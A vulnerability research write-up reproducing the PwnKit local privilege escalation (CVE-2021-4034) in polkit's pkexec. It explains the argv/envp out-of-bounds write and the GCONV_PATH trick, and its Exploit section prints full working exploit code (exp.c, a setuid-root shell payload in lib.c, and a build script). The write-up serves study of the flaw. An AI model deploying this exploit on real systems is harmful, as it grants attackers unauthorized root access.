Reproduction of CVE-2021-4034

Background

I chose to reproduce this vulnerability because it is quite interesting: it takes advantage of an out-of-bounds write and turns it into a vector for privilege escalation.

Moreover, after reading some articles, two questions remain in my mind:

Why can’t we set LD_PRELOAD to get command execution? Many attackers use this technique to bypass disabled functions in PHP.
If LD_PRELOAD cannot be used, why can GCONV_PATH? Why can’t other sensitive environment variables be used? What is unique about it?

Though a few articles touch on these two questions, none of them gives a comprehensive answer.

Therefore, with these two questions in mind, I started my journey to reproduce this vulnerability.

Reproduction Environment

There is an existing Docker image for this issue, created by “chenaotian”: https://hub.docker.com/r/chenaotian/cve-2021-4034

Therefore, we can use it directly.

docker run -d -ti --rm -h cvedebug --name cvedebug --cap-add=SYS_PTRACE chenaotian/cve-2021-4034:latest /bin/bash

docker exec -it cvedebug /bin/bash

cd ~

ls

What is good about this image is that it also contains a debugger.

Vulnerability Analysis

Many articles do a great job on this part. I will go over it again in the most straightforward way.

“pkexec allows an authorized user to execute PROGRAM as another user. If username is not specified, then the program will be executed as the administrative super user, root.”

pkexec has its SUID bit set.

The logic that processes the parameters starts at line 533 of pkexec.c:

https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c

n is initialized to 1 and the program uses argv[n] to fetch the first argument.

This is a common approach because argv[0] is “pkexec” itself when pkexec is started from a terminal.

gdb /usr/local/bin/pkexec

Reading symbols from /usr/local/bin/pkexec...done.
pwndbg> b main
Breakpoint 1 at 0x1fb0: file pkexec.c, line 387.

pwndbg> r

|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
     V         V                V           V         V                V
 "program" "-option"           NULL      "value" "PATH=name"          NULL

In this run argc is 1, so argv[1] is just the terminating NULL pointer (argv[argc]) and does not point to anything meaningful. Another noticeable observation is that the environment pointers start right after it: argv[argc+1] is envp[0].

This can also be confirmed from the kernel source code behind execve():

// linux5.4/fs/binfmt_elf.c:
static int
create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec,
        unsigned long load_addr, unsigned long interp_load_addr)
{
...
    sp = STACK_ADD(p, ei_index);
...

    /* Now, let's put argc (and argv, envp if appropriate) on the stack */
    // argc is written to the stack
    if (__put_user(argc, sp++))
        return -EFAULT;

    // the argv pointers are written to the stack
    /* Populate list of argv pointers back to argv strings. */
    p = current->mm->arg_end = current->mm->arg_start;
    while (argc-- > 0) {
        size_t len;
        if (__put_user((elf_addr_t)p, sp++))
            return -EFAULT;
        len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
        if (!len || len > MAX_ARG_STRLEN)
            return -EINVAL;
        p += len;
    }
    // the NULL terminator of argv is written
    if (__put_user(0, sp++))
        return -EFAULT;
    current->mm->arg_end = p;

    // the envp pointers are written
    /* Populate list of envp pointers back to envp strings. */
    current->mm->env_end = current->mm->env_start = p;
    while (envc-- > 0) {
        size_t len;
        if (__put_user((elf_addr_t)p, sp++))
            return -EFAULT;
        len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
        if (!len || len > MAX_ARG_STRLEN)
            return -EINVAL;
        p += len;
    }
    // the NULL terminator of envp is written
    if (__put_user(0, sp++))
        return -EFAULT;
...
}

But what if pkexec is executed through execve() with argv explicitly set to (char**){NULL}?

The answer is that argc becomes 0, argv[0] is NULL, and argv[1] is actually envp[0], the first environment variable.

On line 609, path is assigned the value of argv[1], which is actually envp[0].

On line 631, because path is not an absolute path, s is assigned the full path of the program, found by searching the directories listed in PATH for that name.

The definition of g_find_program_in_path can be found at https://fossies.org/dox/pkg-config-0.29.2/gutils_8c_source.html#l00298

On line 638, s is written back to argv[1], which is envp[0].

Therefore, we are able to write a new environment variable.

From Qualys:

If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an executable file named “value”, then a pointer to the string “name/value” is written out-of-bounds to envp[0];

If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the string “name=./value” is written out-of-bounds to envp[0].
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

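An example would be:

/* Before execution, create a directory named "ABC=." in the current
 * working directory, then create an executable file called "test"
 * inside that directory. */
#include <unistd.h>

int main(void)
{
    char *a_argv[] = { NULL };
    char *a_envp[] = {
        "test",
        "PATH=ABC=.",
        NULL
    };
    execve("/usr/bin/pkexec", a_argv, a_envp);
    return 1; /* only reached if execve() fails */
}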

According to the above logic, envp[0] becomes “ABC=./test”.

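What is the point of spending so much effort to inject an environment variable?

Why can’t we just pass our crafted environment variable directly when calling execve()?

This is because the dynamic linker ld-linux-x86-64.so.2 removes the sensitive environment variables when it starts a SUID program. The excerpt below is the variant in elf/dl-support.c, which covers statically linked programs; as far as I can tell, the dynamic linker runs an equivalent loop over the same list in process_envvars() in elf/rtld.c.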

# _dl_non_dynamic_init: glibc-2.27/elf/dl-support.c : 307

void
_dl_non_dynamic_init (void)
{
  ··· ···
  ··· ···

  if (__libc_enable_secure) //when SUID set
    {
      static const char unsecure_envvars[] =
	UNSECURE_ENVVARS
#ifdef EXTRA_UNSECURE_ENVVARS
	EXTRA_UNSECURE_ENVVARS
#endif
	;
      const char *cp = unsecure_envvars;

      //(unset all unsecured envvars)
      while (cp < unsecure_envvars + sizeof (unsecure_envvars)) 
	{
	  __unsetenv (cp);
	  cp = (const char *) __rawmemchr (cp, '\0') + 1;
	}

#if !HAVE_TUNABLES
      if (__access ("/etc/suid-debug", F_OK) != 0)
	__unsetenv ("MALLOC_CHECK_");
#endif
    }
··· ···
··· ···
}

# glibc-2.27/sysdeps/generic/unsecvars.h : 10

#define GLIBC_TUNABLES_ENVVAR "GLIBC_TUNABLES\0"
#define UNSECURE_ENVVARS \
  "GCONV_PATH\0"							      \
  "GETCONF_DIR\0"							      \
  GLIBC_TUNABLES_ENVVAR							      \
  "HOSTALIASES\0"							      \
  "LD_AUDIT\0"								      \
  "LD_DEBUG\0"								      \
  "LD_DEBUG_OUTPUT\0"							      \
  "LD_DYNAMIC_WEAK\0"							      \
  "LD_HWCAP_MASK\0"							      \
  "LD_LIBRARY_PATH\0"							      \
  "LD_ORIGIN_PATH\0"							      \
  "LD_PRELOAD\0"							      \
  "LD_PROFILE\0"							      \
  "LD_SHOW_AUXV\0"							      \
  "LD_USE_LOAD_BIAS\0"							      \
  "LOCALDOMAIN\0"							      \
  "LOCPATH\0"								      \
  "MALLOC_TRACE\0"							      \
  "NIS_PATH\0"								      \
  "NLSPATH\0"								      \
  "RESOLV_HOST_CONF\0"							      \
  "RES_OPTIONS\0"							      \
  "TMPDIR\0"								      \
  "TZDIR\0"

Exploit

The g_printerr() function is used several times in pkexec. If the environment variable CHARSET is not UTF-8, g_printerr() will call glibc’s function iconv_open() to convert the message from UTF-8 to another format.

The iconv_open() function allocates a conversion descriptor for converting a sequence of characters from encoding fromcode to encoding tocode; the descriptor holds the conversion state. The conversion code for each character set is stored in a .so file, and glibc follows the entries in the gconv-modules file to locate and load the .so file that corresponds to the requested encodings. If the environment variable GCONV_PATH is present, iconv_open() looks for the gconv-modules file under GCONV_PATH, and the subsequent operations remain unchanged.

Therefore, what remains is to find a way to trigger iconv_open().

Fortunately, there is a function called “validate_environment_variable”.

We can see that if the variable “SHELL” or “XAUTHORITY” carries a value that fails validation (for example, a SHELL that is not listed in /etc/shells), g_printerr() will be triggered.

Knowing all of the above, the following exploit is easy to understand:

(code is from https://github.com/chenaotian/CVE-2021-4034)

# exp.c

#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
        char * const a_argv [] = { NULL};
        char * const a_envp[] = {
                "pwnkitdir",
                "PATH=GCONV_PATH=.",
                "CHARSET=PWNKIT",
                "SHELL=xxx",
                NULL
        };
        execve("/usr/local/bin/pkexec", a_argv, a_envp);
}

# lib.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void __attribute__ ((constructor)) exp(void);
static void exp(void)
{
        setuid(0); seteuid(0); setgid(0); setegid(0);
        static char *a_argv[] = { "sh", NULL };
        static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
        execve("/bin/sh", a_argv, a_envp);
}

# run.sh

mkdir 'GCONV_PATH=.'
touch 'GCONV_PATH=./pwnkitdir'
chmod 777 'GCONV_PATH=./pwnkitdir'
mkdir pwnkitdir
touch pwnkitdir/gconv-modules
echo "module UTF-8// PWNKIT// pwnkit 1" >> pwnkitdir/gconv-modules
gcc -fPIC -shared lib.c -o pwnkitdir/pwnkit.so
gcc exp.c -o exp

Answers to the First Two Questions

During the journey of reproduction, I did find the answers to the first two questions.

Why can’t we set LD_PRELOAD to get command execution? Many attackers use this technique to bypass disabled functions in PHP.

This is because LD_PRELOAD only takes effect before the program starts executing: the dynamic linker reads it while loading the process. Since pkexec’s vulnerability is in main(), the linker has already finished by then, so re-introducing LD_PRELOAD does not change what has been loaded.

Why is it useful for PHP? Because many PHP functions start a new process, and it is while that new process is being loaded that LD_PRELOAD takes effect (the child process inherits its parent’s environment).

If LD_PRELOAD cannot be used, why can GCONV_PATH? Why can’t other sensitive environment variables be used? What is unique about it?

The reason why GCONV_PATH works is illustrated in the Exploit section: iconv_open() uses this path to find the .so file.

Why does it seem to be the only vector in all exploits?

This is because the environment is sanitized on line 701. So the attack must happen before line 701 and after line 638 (where the environment is modified). It is a small window, so GCONV_PATH is probably the only chance for hijacking.

References

https://github.com/chenaotian/CVE-2021-4034
https://xz.aliyun.com/t/10905
https://saucer-man.com/information_security/876.html
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
https://www.yijinglab.com/specialized/20220222150802
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
http://blog.gamous.cn/post/cve-2021-4034/
https://www.iceswordlab.com/2022/02/10/CVE-2021-4034/